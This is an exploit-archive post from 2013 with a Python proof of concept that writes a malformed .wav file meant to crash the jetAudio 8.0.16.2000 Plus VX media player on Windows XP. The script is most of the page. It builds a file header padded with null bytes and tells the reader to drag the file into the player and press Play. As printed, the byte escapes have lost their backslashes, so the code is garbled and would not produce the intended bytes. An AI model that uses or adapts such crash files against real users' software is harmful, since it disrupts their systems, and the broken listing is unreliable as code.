Home / exploits jetAudio 8.0.16.2000 Plus VX Crash Proof Of Concept
Posted on 06 September 2013
# Exploit Title: jetAudio Version 8.0.16.2000 Plus VX - (.wav) - Crash POC # Date: 03-09-2013 # Exploit Author: ariarat # Software Link: http://www.jetaudio.com/download/ # Version: 8.0.16.2000 (Probably old version of software and the LATEST version too) # Vendor Homepage: http://www.jetaudio.com # Tested on: [ Windows XP sp3] #============================================================================================ # After creating POC file (.wav),drag it to Player and click Play button! #============================================================================================ # Contact : #------------------ # Web Page : http://ariarat.blogspot.com # Email : mehdi.esmaeelpour@gmail.com #============================================================================================ #!/usr/bin/python string=("x2Ex73x6Ex64x00x00x01x18x00x00x42xDCx00x00x00x01" "x00x00x1Fx40x00x00x00x00x69x61x70x65x74x75x73x2E" "x61x75x00x20x22x69x61x70x65x74x75x73x2Ex61x75x22" "x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00") filename = "jetAudio.wav" file = open(filename , "w") file.write(string) file.close()
